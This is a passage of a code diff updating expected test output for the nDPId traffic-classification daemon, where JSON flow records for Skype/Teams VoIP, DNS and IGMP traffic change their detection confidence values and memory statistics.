+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.144","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969721954,"flow_last_seen":1431969748262,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52714,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969720556,"flow_last_seen":1431969746803,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52742,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.141","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969723979,"flow_last_seen":1431969750316,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969674456,"flow_last_seen":1431969674456,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969642337,"flow_last_seen":1431969668794,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65045,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969745776,"flow_last_seen":1431969747554,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969745776,"flow_last_seen":1431969747554,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40034,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969679451,"flow_last_seen":1431969698502,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":90,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","packets-captured":3284,"packets-processed":3069,"total-skipped-flows":0,"total-l4-payload-len":444195,"total-not-detected-flows":61,"total-guessed-flows":28,"total-detected-flows":204,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":293,"total-idle-flows":293,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1467,"global_ts_msec":1431969808951} @@ -1473,9 +1473,9 @@ ~~ total active/idle flows...: 293/293 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6604366 bytes -~~ total memory freed........: 6604366 bytes -~~ total allocations/frees...: 122503/122503 +~~ total memory allocated....: 6607300 bytes +~~ total memory freed........: 6607300 bytes +~~ total allocations/frees...: 125218/125218 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 444 chars ~~ json string max len.......: 1773 chars diff --git a/test/results/skype_no_unknown.pcap.out b/test/results/skype_no_unknown.pcap.out index fa6c0a62f..a2998c305 100644 --- a/test/results/skype_no_unknown.pcap.out +++ b/test/results/skype_no_unknown.pcap.out @@ -2,72 +2,72 @@ 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skype_no_unknown.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431970631778} 00549{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431970632290,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":60,"pkt_l4_len":16,"thread_ts_msec":1431970632290,"pkt":"AQBeAAAWJKQ8\/kzXCABGwAAoAABAAAECQXbAqAHb4AAAFpQEAAAiADajAAAAAQIAAADpWbwBAAAAAAAA"} -00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":620000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970632290,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431970634276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634276,"pkt":"0NQSxnP1PBXCt3IOCABFAABAj1gAAEARZ+HAqAEiwKgBAdb0ADUALMTUeDABAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAAQAB"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431970634276,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634276,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlRoAAEARYh\/AqAEiwKgBAf3LADUALKDXdTsBAAABAAAAAAAAAWEGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"a.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634276,"flow_last_seen":1431970634276,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970634276,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64971,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": 